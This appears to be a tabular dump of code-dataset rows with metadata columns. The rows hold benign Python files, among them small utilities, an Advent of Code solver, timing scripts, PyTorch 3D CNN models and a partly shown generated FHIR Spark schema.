| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
0e983ab2cd6b0a4df6893fccbc7774f551054345
| 121
|
py
|
Python
|
tests/utils/test_functions.py
|
jecalles/genetic-codes
|
ba5bdecf28663a5e6cee77c224e53c02e5ef06d9
|
[
"MIT"
] | null | null | null |
tests/utils/test_functions.py
|
jecalles/genetic-codes
|
ba5bdecf28663a5e6cee77c224e53c02e5ef06d9
|
[
"MIT"
] | null | null | null |
tests/utils/test_functions.py
|
jecalles/genetic-codes
|
ba5bdecf28663a5e6cee77c224e53c02e5ef06d9
|
[
"MIT"
] | null | null | null |
from codes import Code
from codes.utils import definitions
from codes.utils import functions
print(functions.__dir__())
| 20.166667
| 35
| 0.826446
| 17
| 121
| 5.647059
| 0.529412
| 0.28125
| 0.291667
| 0.416667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115702
| 121
| 5
| 36
| 24.2
| 0.897196
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0.25
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
0ea012ceef7dcb99d66695696bb4ab532dcf2d93
| 62
|
py
|
Python
|
app/app/calc.py
|
sanjana-302/food-foodie-rest
|
df014e86f8aafc10e9fb0f9ce9dd933ab5f47ae6
|
[
"MIT"
] | null | null | null |
app/app/calc.py
|
sanjana-302/food-foodie-rest
|
df014e86f8aafc10e9fb0f9ce9dd933ab5f47ae6
|
[
"MIT"
] | null | null | null |
app/app/calc.py
|
sanjana-302/food-foodie-rest
|
df014e86f8aafc10e9fb0f9ce9dd933ab5f47ae6
|
[
"MIT"
] | null | null | null |
def add(x,y):
return x+y
def subtract(x,y):
return x-y
| 15.5
| 18
| 0.596774
| 14
| 62
| 2.642857
| 0.428571
| 0.216216
| 0.432432
| 0.486486
| 0.540541
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.241935
| 62
| 4
| 19
| 15.5
| 0.787234
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
7d2de7116a341d2c49b33088d9c21f2bf4320b90
| 515
|
py
|
Python
|
2017/5/computer.py
|
lvaughn/advent
|
ff3f727b8db1fd9b2a04aad5dcda9a6c8d1c271e
|
[
"CC0-1.0"
] | null | null | null |
2017/5/computer.py
|
lvaughn/advent
|
ff3f727b8db1fd9b2a04aad5dcda9a6c8d1c271e
|
[
"CC0-1.0"
] | null | null | null |
2017/5/computer.py
|
lvaughn/advent
|
ff3f727b8db1fd9b2a04aad5dcda9a6c8d1c271e
|
[
"CC0-1.0"
] | null | null | null |
#!/usr/bin/env python3
with open('input.txt', 'r') as f:
memory = [int(a) for a in f]
steps, pc = 0, 0
while 0 <= pc < len(memory):
to_move = memory[pc]
memory[pc] += 1
steps += 1
pc += to_move
print('Part 1', steps)
with open('input.txt', 'r') as f:
memory = [int(a) for a in f]
steps, pc = 0, 0
while 0 <= pc < len(memory):
to_move = memory[pc]
if to_move >= 3:
memory[pc] -= 1
else:
memory[pc] += 1
steps += 1
pc += to_move
print('Part 2', steps)
| 18.392857
| 33
| 0.530097
| 90
| 515
| 2.977778
| 0.333333
| 0.11194
| 0.100746
| 0.119403
| 0.813433
| 0.813433
| 0.813433
| 0.813433
| 0.813433
| 0.813433
| 0
| 0.041209
| 0.293204
| 515
| 28
| 34
| 18.392857
| 0.695055
| 0.040777
| 0
| 0.761905
| 0
| 0
| 0.064777
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.095238
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
adb5bb145930a01e11fef550e9c2112c5feb0231
| 46
|
py
|
Python
|
libsovereign/__init__.py
|
sousouindustries/python-libsovereign
|
c7176ab76c1ef0279c5344b772da03082db17c37
|
[
"BSD-4-Clause"
] | null | null | null |
libsovereign/__init__.py
|
sousouindustries/python-libsovereign
|
c7176ab76c1ef0279c5344b772da03082db17c37
|
[
"BSD-4-Clause"
] | null | null | null |
libsovereign/__init__.py
|
sousouindustries/python-libsovereign
|
c7176ab76c1ef0279c5344b772da03082db17c37
|
[
"BSD-4-Clause"
] | null | null | null |
def get_version():
return '1.0.0alpha1'
| 9.2
| 24
| 0.630435
| 7
| 46
| 4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 0.217391
| 46
| 4
| 25
| 11.5
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
adcd7c53bf3c8d26833f30d251b03520da51b3bb
| 4,796
|
py
|
Python
|
CSCI381_Homework1/TestDataSets.py
|
Shashi717/MachineLearningProjects
|
447d1fb160dc1ceb1530933049c8d696a28b2b71
|
[
"MIT"
] | null | null | null |
CSCI381_Homework1/TestDataSets.py
|
Shashi717/MachineLearningProjects
|
447d1fb160dc1ceb1530933049c8d696a28b2b71
|
[
"MIT"
] | null | null | null |
CSCI381_Homework1/TestDataSets.py
|
Shashi717/MachineLearningProjects
|
447d1fb160dc1ceb1530933049c8d696a28b2b71
|
[
"MIT"
] | null | null | null |
# script to test your computation code
# do not change this file
from ComputeMatrices import compute_distance_naive, \
compute_distance_smart, compute_correlation_naive, \
compute_correlation_smart
import numpy as np
import time
import matplotlib.pyplot as plt
from sklearn.datasets import load_iris
from sklearn.datasets import load_breast_cancer
from sklearn.datasets import load_digits
# an example code for testing
def main():
iris = load_iris()
breastcancer = load_breast_cancer()
digits = load_digits()
X = iris.data
Y = breastcancer.data
Z = digits.data
iris_loop_start = time.time()
distance_loop = compute_distance_naive(X)
iris_loop_end = time.time()
iris_cool_start = time.time()
distance_cool = compute_distance_smart(X)
iris_cool_end = time.time()
breastcancer_loop_start = time.time()
distance_loop = compute_distance_naive(Y)
breastcancer_loop_end = time.time()
breastcancer_cool_start = time.time()
distance_cool = compute_distance_smart(Y)
breastcancer_cool_end = time.time()
digits_loop_start = time.time()
distance_loop = compute_distance_naive(Z)
digits_loop_end = time.time()
digits_cool_start = time.time()
distance_cool = compute_distance_smart(Z)
digits_cool_end = time.time()
duration_loop_iris = iris_loop_end - iris_loop_start
duration_loop_bc = breastcancer_loop_end - breastcancer_loop_start
duration_loop_digits = digits_loop_end - digits_loop_start
duration_cool_iris = iris_cool_end - iris_cool_start
duration_cool_bc = breastcancer_cool_end - breastcancer_cool_start
duration_cool_digits = digits_cool_end - digits_cool_start
# data for plotting
n_groups = 3
loop_data = (duration_loop_iris, duration_loop_bc, duration_loop_digits)
cool_data = (duration_cool_iris, duration_cool_bc, duration_cool_digits)
# drawing the plot
fig, ax = plt.subplots()
index = np.arange(n_groups)
bar_width = 0.20
opacity = 0.70
rects1 = plt.bar(index, loop_data, bar_width,
alpha=opacity,
color='r',
label='loop')
rects2 = plt.bar(index + bar_width, cool_data, bar_width,
alpha=opacity,
color='b',
label='cool')
plt.xlabel('Data Set')
plt.ylabel('Compute Time - Distance')
plt.title('Compute-Time Comparison')
plt.xticks(index + bar_width, ('Iris', 'Breast Cancer', 'Digits'))
plt.legend()
plt.tight_layout()
plt.savefig('DistanceTimeComparison.pdf')
print "result is written to DistanceTimeComparison.pdf"
iris_loop_start = time.time()
distance_loop = compute_correlation_naive(X)
iris_loop_end = time.time()
iris_cool_start = time.time()
distance_cool = compute_correlation_smart(X)
iris_cool_end = time.time()
breastcancer_loop_start = time.time()
distance_loop = compute_correlation_naive(Y)
breastcancer_loop_end = time.time()
breastcancer_cool_start = time.time()
distance_cool = compute_correlation_smart(Y)
breastcancer_cool_end = time.time()
digits_loop_start = time.time()
distance_loop = compute_correlation_naive(Z)
digits_loop_end = time.time()
digits_cool_start = time.time()
distance_cool = compute_correlation_smart(Z)
digits_cool_end = time.time()
duration_loop_iris = iris_loop_end - iris_loop_start
duration_loop_bc = breastcancer_loop_end - breastcancer_loop_start
duration_loop_digits = digits_loop_end - digits_loop_start
duration_cool_iris = iris_cool_end - iris_cool_start
duration_cool_bc = breastcancer_cool_end - breastcancer_cool_start
duration_cool_digits = digits_cool_end - digits_cool_start
# data for plotting
n_groups = 3
loop_data = (duration_loop_iris, duration_loop_bc, duration_loop_digits)
cool_data = (duration_cool_iris, duration_cool_bc, duration_cool_digits)
# drawing the plot
fig, ax = plt.subplots()
index = np.arange(n_groups)
bar_width = 0.20
opacity = 0.70
rects1 = plt.bar(index, loop_data, bar_width,
alpha=opacity,
color='r',
label='loop')
rects2 = plt.bar(index + bar_width, cool_data, bar_width,
alpha=opacity,
color='b',
label='cool')
plt.xlabel('Data Set')
plt.ylabel('Compute Time - Correlation')
plt.title('Compute-Time Comparison')
plt.xticks(index + bar_width, ('Iris', 'Breast Cancer', 'Digits'))
plt.legend()
plt.tight_layout()
plt.savefig('CovarianceTimeComparison.pdf')
print "result is written to CovarianceTimeComparison.pdf"
if __name__ == "__main__": main()
| 33.075862
| 76
| 0.696414
| 618
| 4,796
| 5.035599
| 0.152104
| 0.061697
| 0.050129
| 0.080977
| 0.842866
| 0.81491
| 0.798843
| 0.798843
| 0.796272
| 0.736504
| 0
| 0.004806
| 0.219141
| 4,796
| 144
| 77
| 33.305556
| 0.826168
| 0.032944
| 0
| 0.684685
| 0
| 0
| 0.072354
| 0.023326
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.063063
| null | null | 0.018018
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bc05f25d9cd17faa58186fa4646e181feccf83a1
| 6,153
|
py
|
Python
|
clinicadl/clinicadl/tools/deep_learning/models/image_level.py
|
ghisvail/AD-DL
|
c11d08c651b9bbefdab08ddbb83a684035583945
|
[
"MIT"
] | null | null | null |
clinicadl/clinicadl/tools/deep_learning/models/image_level.py
|
ghisvail/AD-DL
|
c11d08c651b9bbefdab08ddbb83a684035583945
|
[
"MIT"
] | null | null | null |
clinicadl/clinicadl/tools/deep_learning/models/image_level.py
|
ghisvail/AD-DL
|
c11d08c651b9bbefdab08ddbb83a684035583945
|
[
"MIT"
] | null | null | null |
# coding: utf8
from .modules import PadMaxPool3d, Flatten
import torch.nn as nn
import torch
"""
All the architectures are built here
"""
class Conv5_FC3(nn.Module):
"""
Classifier for a binary classification task
Image level architecture used on Minimal preprocessing
"""
def __init__(self, dropout=0.5):
super(Conv5_FC3, self).__init__()
self.features = nn.Sequential(
nn.Conv3d(1, 8, 3, padding=1),
nn.BatchNorm3d(8),
nn.ReLU(),
PadMaxPool3d(2, 2),
nn.Conv3d(8, 16, 3, padding=1),
nn.BatchNorm3d(16),
nn.ReLU(),
PadMaxPool3d(2, 2),
nn.Conv3d(16, 32, 3, padding=1),
nn.BatchNorm3d(32),
nn.ReLU(),
PadMaxPool3d(2, 2),
nn.Conv3d(32, 64, 3, padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
PadMaxPool3d(2, 2),
nn.Conv3d(64, 128, 3, padding=1),
nn.BatchNorm3d(128),
nn.ReLU(),
PadMaxPool3d(2, 2),
)
self.classifier = nn.Sequential(
Flatten(),
nn.Dropout(p=dropout),
nn.Linear(128 * 6 * 7 * 6, 1300),
nn.ReLU(),
nn.Linear(1300, 50),
nn.ReLU(),
nn.Linear(50, 2)
)
self.flattened_shape = [-1, 128, 6, 7, 6]
def forward(self, x):
x = self.features(x)
x = self.classifier(x)
return x
class VConv5_FC3(nn.Module):
"""
Classifier for a binary classification task
Image level architecture used on Minimal preprocessing
"""
def __init__(self, dropout=0.5):
super(VConv5_FC3, self).__init__()
self.features = nn.Sequential(
nn.Conv3d(1, 8, 3, padding=1),
nn.BatchNorm3d(8),
nn.ReLU(),
PadMaxPool3d(2, 2),
nn.Conv3d(8, 16, 3, padding=1),
nn.BatchNorm3d(16),
nn.ReLU(),
PadMaxPool3d(2, 2),
nn.Conv3d(16, 32, 3, padding=1),
nn.BatchNorm3d(32),
nn.ReLU(),
PadMaxPool3d(2, 2),
nn.Conv3d(32, 64, 3, padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
PadMaxPool3d(2, 2),
nn.Conv3d(64, 128, 3, padding=1),
nn.BatchNorm3d(128),
nn.ReLU(),
PadMaxPool3d(2, 2),
)
self.fc_mu = nn.Sequential(
Flatten(),
nn.Linear(128 * 6 * 7 * 6, 1300)
)
self.fc_var = nn.Sequential(
Flatten(),
nn.Linear(128 * 6 * 7 * 6, 1300)
)
self.classifier = nn.Sequential(
nn.Linear(1300, 50),
nn.ReLU(),
nn.Linear(50, 2)
)
self.flattened_shape = [-1, 128, 6, 7, 6]
self.variational = True
def forward(self, x):
x = self.features(x)
log_var = self.fc_var(x)
mu = self.fc_mu(x)
std = torch.exp(log_var / 2)
if self.training:
q = torch.distributions.Normal(mu, std)
z = q.rsample()
else:
z = mu
out = self.classifier(z)
return z, mu, std, out
class Conv5_FC3_mni(nn.Module):
"""
Classifier for a binary classification task
Image level architecture used on Extensive preprocessing
"""
def __init__(self, dropout=0.5):
super(Conv5_FC3_mni, self).__init__()
self.features = nn.Sequential(
nn.Conv3d(1, 8, 3, padding=1),
nn.BatchNorm3d(8),
nn.ReLU(),
PadMaxPool3d(2, 2),
nn.Conv3d(8, 16, 3, padding=1),
nn.BatchNorm3d(16),
nn.ReLU(),
PadMaxPool3d(2, 2),
nn.Conv3d(16, 32, 3, padding=1),
nn.BatchNorm3d(32),
nn.ReLU(),
PadMaxPool3d(2, 2),
nn.Conv3d(32, 64, 3, padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
PadMaxPool3d(2, 2),
nn.Conv3d(64, 128, 3, padding=1),
nn.BatchNorm3d(128),
nn.ReLU(),
PadMaxPool3d(2, 2),
)
self.classifier = nn.Sequential(
Flatten(),
nn.Dropout(p=dropout),
nn.Linear(128 * 4 * 5 * 4, 1300),
nn.ReLU(),
nn.Linear(1300, 50),
nn.ReLU(),
nn.Linear(50, 2)
)
self.flattened_shape = [-1, 128, 4, 5, 4]
def forward(self, x):
x = self.features(x)
x = self.classifier(x)
return x
class Conv6_FC3(nn.Module):
"""
Classifier for a binary classification task
Image level architecture used on Minimal preprocessing
"""
def __init__(self, dropout=0.5):
super(Conv6_FC3, self).__init__()
self.features = nn.Sequential(
nn.Conv3d(1, 8, 3, padding=1),
nn.BatchNorm3d(8),
nn.ReLU(),
PadMaxPool3d(2, 2),
nn.Conv3d(8, 16, 3, padding=1),
nn.BatchNorm3d(16),
nn.ReLU(),
PadMaxPool3d(2, 2),
nn.Conv3d(16, 32, 3, padding=1),
nn.BatchNorm3d(32),
nn.ReLU(),
PadMaxPool3d(2, 2),
nn.Conv3d(32, 64, 3, padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
PadMaxPool3d(2, 2),
nn.Conv3d(64, 128, 3, padding=1),
nn.BatchNorm3d(128),
nn.ReLU(),
PadMaxPool3d(2, 2),
nn.Conv3d(128, 256, 3, padding=1),
nn.BatchNorm3d(256),
nn.ReLU(),
PadMaxPool3d(2, 2),
)
self.classifier = nn.Sequential(
Flatten(),
nn.Dropout(p=dropout),
nn.Linear(256 * 3 * 4 * 3, 1000),
nn.ReLU(),
nn.Linear(1000, 50),
nn.ReLU(),
nn.Linear(50, 2)
)
self.flattened_shape = [-1, 256, 3, 4, 3]
def forward(self, x):
x = self.features(x)
x = self.classifier(x)
return x
| 23.044944
| 60
| 0.476353
| 719
| 6,153
| 4.004172
| 0.123783
| 0.058354
| 0.065648
| 0.080236
| 0.860368
| 0.852727
| 0.852727
| 0.848906
| 0.838833
| 0.838833
| 0
| 0.109125
| 0.390866
| 6,153
| 266
| 61
| 23.131579
| 0.659018
| 0.067447
| 0
| 0.761364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.017045
| 0
| 0.107955
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bc1933a1a0c3c23473be0f6e4eeb7b7fd15a88cc
| 25,912
|
py
|
Python
|
spark_fhir_schemas/r4/complex_types/molecularsequence_quality.py
|
icanbwell/SparkFhirSchemas
|
8c828313c39850b65f8676e67f526ee92b7d624e
|
[
"Apache-2.0"
] | null | null | null |
spark_fhir_schemas/r4/complex_types/molecularsequence_quality.py
|
icanbwell/SparkFhirSchemas
|
8c828313c39850b65f8676e67f526ee92b7d624e
|
[
"Apache-2.0"
] | null | null | null |
spark_fhir_schemas/r4/complex_types/molecularsequence_quality.py
|
icanbwell/SparkFhirSchemas
|
8c828313c39850b65f8676e67f526ee92b7d624e
|
[
"Apache-2.0"
] | null | null | null |
from typing import Union, List, Optional
from pyspark.sql.types import StructType, StructField, StringType, ArrayType, DataType
# This file is auto-generated by generate_schema so do not edit it manually
# noinspection PyPep8Naming
class MolecularSequence_QualitySchema:
"""
Raw data describing a biological sequence.
"""
# noinspection PyDefaultArgument
@staticmethod
def get_schema(
max_nesting_depth: Optional[int] = 6,
nesting_depth: int = 0,
nesting_list: List[str] = [],
max_recursion_limit: Optional[int] = 2,
include_extension: Optional[bool] = False,
extension_fields: Optional[List[str]] = None,
extension_depth: int = 0,
max_extension_depth: Optional[int] = 2,
include_modifierExtension: Optional[bool] = False,
use_date_for: Optional[List[str]] = None,
parent_path: Optional[str] = "",
) -> Union[StructType, DataType]:
"""
Raw data describing a biological sequence.
id: Unique id for the element within a resource (for internal references). This
may be any string value that does not contain spaces.
extension: May be used to represent additional information that is not part of the basic
definition of the element. To make the use of extensions safe and manageable,
there is a strict set of governance applied to the definition and use of
extensions. Though any implementer can define an extension, there is a set of
requirements that SHALL be met as part of the definition of the extension.
modifierExtension: May be used to represent additional information that is not part of the basic
definition of the element and that modifies the understanding of the element
in which it is contained and/or the understanding of the containing element's
descendants. Usually modifier elements provide negation or qualification. To
make the use of extensions safe and manageable, there is a strict set of
governance applied to the definition and use of extensions. Though any
implementer can define an extension, there is a set of requirements that SHALL
be met as part of the definition of the extension. Applications processing a
resource are required to check for modifier extensions.
Modifier extensions SHALL NOT change the meaning of any elements on Resource
or DomainResource (including cannot change the meaning of modifierExtension
itself).
type: INDEL / SNP / Undefined variant.
standardSequence: Gold standard sequence used for comparing against.
start: Start position of the sequence. If the coordinate system is either 0-based or
1-based, then start position is inclusive.
end: End position of the sequence. If the coordinate system is 0-based then end is
exclusive and does not include the last position. If the coordinate system is
1-base, then end is inclusive and includes the last position.
score: The score of an experimentally derived feature such as a p-value ([SO:0001685]
(http://www.sequenceontology.org/browser/current_svn/term/SO:0001685)).
method: Which method is used to get sequence quality.
truthTP: True positives, from the perspective of the truth data, i.e. the number of
sites in the Truth Call Set for which there are paths through the Query Call
Set that are consistent with all of the alleles at this site, and for which
there is an accurate genotype call for the event.
queryTP: True positives, from the perspective of the query data, i.e. the number of
sites in the Query Call Set for which there are paths through the Truth Call
Set that are consistent with all of the alleles at this site, and for which
there is an accurate genotype call for the event.
truthFN: False negatives, i.e. the number of sites in the Truth Call Set for which
there is no path through the Query Call Set that is consistent with all of the
alleles at this site, or sites for which there is an inaccurate genotype call
for the event. Sites with correct variant but incorrect genotype are counted
here.
queryFP: False positives, i.e. the number of sites in the Query Call Set for which
there is no path through the Truth Call Set that is consistent with this site.
Sites with correct variant but incorrect genotype are counted here.
gtFP: The number of false positives where the non-REF alleles in the Truth and Query
Call Sets match (i.e. cases where the truth is 1/1 and the query is 0/1 or
similar).
precision: QUERY.TP / (QUERY.TP + QUERY.FP).
recall: TRUTH.TP / (TRUTH.TP + TRUTH.FN).
fScore: Harmonic mean of Recall and Precision, computed as: 2 * precision * recall /
(precision + recall).
roc: Receiver Operator Characteristic (ROC) Curve to give sensitivity/specificity
tradeoff.
"""
if extension_fields is None:
extension_fields = [
"valueBoolean",
"valueCode",
"valueDate",
"valueDateTime",
"valueDecimal",
"valueId",
"valueInteger",
"valuePositiveInt",
"valueString",
"valueTime",
"valueUnsignedInt",
"valueUri",
"valueUrl",
"valueReference",
"valueCodeableConcept",
"valueAddress",
]
from spark_fhir_schemas.r4.complex_types.extension import ExtensionSchema
from spark_fhir_schemas.r4.complex_types.codeableconcept import (
CodeableConceptSchema,
)
from spark_fhir_schemas.r4.simple_types.integer import integerSchema
from spark_fhir_schemas.r4.complex_types.quantity import QuantitySchema
from spark_fhir_schemas.r4.simple_types.decimal import decimalSchema
from spark_fhir_schemas.r4.complex_types.molecularsequence_roc import (
MolecularSequence_RocSchema,
)
if (
max_recursion_limit
and nesting_list.count("MolecularSequence_Quality") >= max_recursion_limit
) or (max_nesting_depth and nesting_depth >= max_nesting_depth):
return StructType([StructField("id", StringType(), True)])
# add my name to recursion list for later
my_nesting_list: List[str] = nesting_list + ["MolecularSequence_Quality"]
my_parent_path = (
parent_path + ".molecularsequence_quality"
if parent_path
else "molecularsequence_quality"
)
schema = StructType(
[
# Unique id for the element within a resource (for internal references). This
# may be any string value that does not contain spaces.
StructField("id", StringType(), True),
# May be used to represent additional information that is not part of the basic
# definition of the element. To make the use of extensions safe and manageable,
# there is a strict set of governance applied to the definition and use of
# extensions. Though any implementer can define an extension, there is a set of
# requirements that SHALL be met as part of the definition of the extension.
StructField(
"extension",
ArrayType(
ExtensionSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
)
),
True,
),
# May be used to represent additional information that is not part of the basic
# definition of the element and that modifies the understanding of the element
# in which it is contained and/or the understanding of the containing element's
# descendants. Usually modifier elements provide negation or qualification. To
# make the use of extensions safe and manageable, there is a strict set of
# governance applied to the definition and use of extensions. Though any
# implementer can define an extension, there is a set of requirements that SHALL
# be met as part of the definition of the extension. Applications processing a
# resource are required to check for modifier extensions.
#
# Modifier extensions SHALL NOT change the meaning of any elements on Resource
# or DomainResource (including cannot change the meaning of modifierExtension
# itself).
StructField(
"modifierExtension",
ArrayType(
ExtensionSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
)
),
True,
),
# INDEL / SNP / Undefined variant.
StructField("type", StringType(), True),
# Gold standard sequence used for comparing against.
StructField(
"standardSequence",
CodeableConceptSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
),
True,
),
# Start position of the sequence. If the coordinate system is either 0-based or
# 1-based, then start position is inclusive.
StructField(
"start",
integerSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path + ".start",
),
True,
),
# End position of the sequence. If the coordinate system is 0-based then end is
# exclusive and does not include the last position. If the coordinate system is
# 1-base, then end is inclusive and includes the last position.
StructField(
"end",
integerSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path + ".end",
),
True,
),
# The score of an experimentally derived feature such as a p-value ([SO:0001685]
# (http://www.sequenceontology.org/browser/current_svn/term/SO:0001685)).
StructField(
"score",
QuantitySchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
),
True,
),
# Which method is used to get sequence quality.
StructField(
"method",
CodeableConceptSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
),
True,
),
# True positives, from the perspective of the truth data, i.e. the number of
# sites in the Truth Call Set for which there are paths through the Query Call
# Set that are consistent with all of the alleles at this site, and for which
# there is an accurate genotype call for the event.
StructField(
"truthTP",
decimalSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path + ".truthtp",
),
True,
),
# True positives, from the perspective of the query data, i.e. the number of
# sites in the Query Call Set for which there are paths through the Truth Call
# Set that are consistent with all of the alleles at this site, and for which
# there is an accurate genotype call for the event.
StructField(
"queryTP",
decimalSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path + ".querytp",
),
True,
),
# False negatives, i.e. the number of sites in the Truth Call Set for which
# there is no path through the Query Call Set that is consistent with all of the
# alleles at this site, or sites for which there is an inaccurate genotype call
# for the event. Sites with correct variant but incorrect genotype are counted
# here.
StructField(
"truthFN",
decimalSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path + ".truthfn",
),
True,
),
# False positives, i.e. the number of sites in the Query Call Set for which
# there is no path through the Truth Call Set that is consistent with this site.
# Sites with correct variant but incorrect genotype are counted here.
StructField(
"queryFP",
decimalSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path + ".queryfp",
),
True,
),
# The number of false positives where the non-REF alleles in the Truth and Query
# Call Sets match (i.e. cases where the truth is 1/1 and the query is 0/1 or
# similar).
StructField(
"gtFP",
decimalSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
